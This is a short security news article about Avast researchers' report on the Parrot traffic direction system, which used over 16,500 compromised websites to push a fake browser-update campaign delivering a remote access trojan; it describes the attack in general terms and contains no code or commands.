Over 16,500 Sites Hacked To Distribute Malware Through Web Redirection Service

A new traffic directing system (TDS) called Parrot has been spotted leveraging tens of thousands of compromised websites to launch new malicious campaigns.

“TDS infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites and local government sites,” said Avast researchers Pavel Novák and Jan Rubin. mentioned in a report released last week.

Traffic direction systems are used by threat actors to determine whether or not a target is of interest and should be redirected to a malicious domain under their control and act as a gateway to compromise their systems with malware.

cyber security

Earlier in January, BlackBerry’s Research and Intelligence team detailed another TDS called Prometheus which was used in different campaigns mounted by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader malware and SocGholish.

What sets Parrot TDS apart is its enormous reach, with increased activity seen in February and March 2022, as its operators primarily targeted servers hosting poorly secured WordPress sites to gain admin access.

Most of the users targeted by these malicious redirects are located in Brazil, India, USA, Singapore, Indonesia, Argentina, France, Mexico, Pakistan and Russia.

“The appearances of infected sites are changed by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notifications allowing users to update their browsers, offering an update file for download “, said the researchers. “The observed file given to the victims is a remote access tool.”

cyber security

Parrot TDS, via an injected PHP script hosted on the compromised server, is designed to extract client information and forward the request to the command and control (C2) server when visiting one of the infected sites, in addition to allow the attacker to execute arbitrary code on the server.

The response from the C2 server takes the form of JavaScript code executed on the client machine, exposing victims to new potential threats. Apart from the malicious backdoor PHP script, a web shell is also observed that grants the adversary persistent remote access to the web server.

Calling the criminal actors behind the FakeUpdate campaign a prominent Parrot TDS client, Avast said the attacks involved tricking users into downloading malware under the guise of malicious browser updates, an access trojan remote named “ctfmon.exe” which gives the attacker full access to the host.

Comments are closed.